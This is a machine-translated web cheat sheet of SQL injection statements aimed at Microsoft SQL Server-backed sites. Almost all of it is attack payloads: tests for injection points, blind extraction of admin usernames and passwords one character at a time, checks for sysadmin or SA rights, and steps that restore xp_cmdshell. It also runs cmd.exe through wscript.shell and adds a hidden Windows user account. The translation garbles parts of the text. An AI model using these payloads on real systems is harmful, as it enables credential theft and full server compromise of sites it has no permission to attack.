Common SQL injection statement parsing bitsCN.com
SQL injection statement
1. determine whether there are any injection points
'; And 1 = 1 and 1 = 2
2. Generally, the name of a table is admin adminuser user pass password ..
And 0 <> (select count (*) from *)
And 0 <> (select count (*) from admin) --- determine whether the admin table exists
3. if the number of accounts is 0, the correct page is returned. 1 <返回错误页面说明帐号数目就是1个< p>
And 0 <(select count (*) from admin)
And 1 <(select count (*) from admin)
4. add the expected field name to The len () brackets.
And 1 = (select count (*) from admin where len (*)> 0 )--
And 1 = (select count (*) from admin where len (user field name)> 0)
And 1 = (select count (*) from admin where len (password field name)> 0)
5. guess the length of each field. the length of each field is changed to 0 until the correct page is returned.
And 1 = (select count (*) from admin where len (*)> 0)
And 1 = (select count (*) from admin where len (name)> 6) error
And 1 = (select count (*) from admin where len (name)> 5) the correct length is 6
And 1 = (select count (*) from admin where len (name) = 6) correct
And 1 = (select count (*) from admin where len (password)> 11) correct
And 1 = (select count (*) from admin where len (password)> 12) the error length is 12
And 1 = (select count (*) from admin where len (password) = 12) correct
6. escape characters
And 1 = (select count (*) from admin where left (name, 1) = 'a') --- guess the first account
And 1 = (select count (*) from admin where left (name, 2) = 'AB') --- second place of the user account
In this way, you can add a character to guess the number of digits you have just guessed. even if the account has come out
And 1 = (select top 1 count (*) from Admin where Asc (mid (pass, 5, 1) = 51 )--
This query statement can be used to guess the Chinese user and password. you only need to replace the following number with the Chinese ASSIC code, and then convert the result to a character.
Check the server patch = SP4 patch hit
And 1 = (select @ VERSION )--
Check the permissions of the database connection account. the returned result is normal, proving that it is the server role sysadmin permission.
And 1 = (Select IS_SRVROLEMEMBER ('sysadmin '))--
Determine the database account to connect. (Using the SA account for connection returns normal = proves that the connection account is SA)
And 'sa '= (Select System_user )--
And user_name () = 'dbo '--
And 0 <> (select user_name ()--
Check whether xp_cmdshell is deleted.
And 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = 'x' AND
Name = 'XP _ cmdshell ')--
Xp_recovery shell is deleted and restored. it supports absolute path recovery.
; EXEC master. dbo. sp_addextendedproc 'XP _ mongoshell', 'XP log70. dll '--
; EXEC master. dbo. sp_addextendedproc
'XP _ cmdshell', 'C:/inetpub/wwwroot/xplog70.dll '--
PING your own lab in reverse order
; Use master; declare @ s int; exec sp_oacreate "wscript. shell", @ s out; exec
Sp_oamethod @ s, "run", NULL, "cmd.exe/c ping 192.168.0.1 ";--
Add Account
; DECLARE @ shell int exec SP_OACreate 'wscript. shell', @ shell OUTPUT EXEC
SP_OAMETHOD @ shell, 'run', null, 'C:/WINNT/system32/cmd.exe/C net user
Jiaoniang $1866574/add '--
Create a virtual directory edisk:
; Declare @ o int exec sp_oacreate 'wscript. shell', @ o out exec sp_oamethod
@ O, 'run', NULL, 'cscript.exe c:/inetpub/wwwroot/mkwebdir. vbs-
BitsCN.com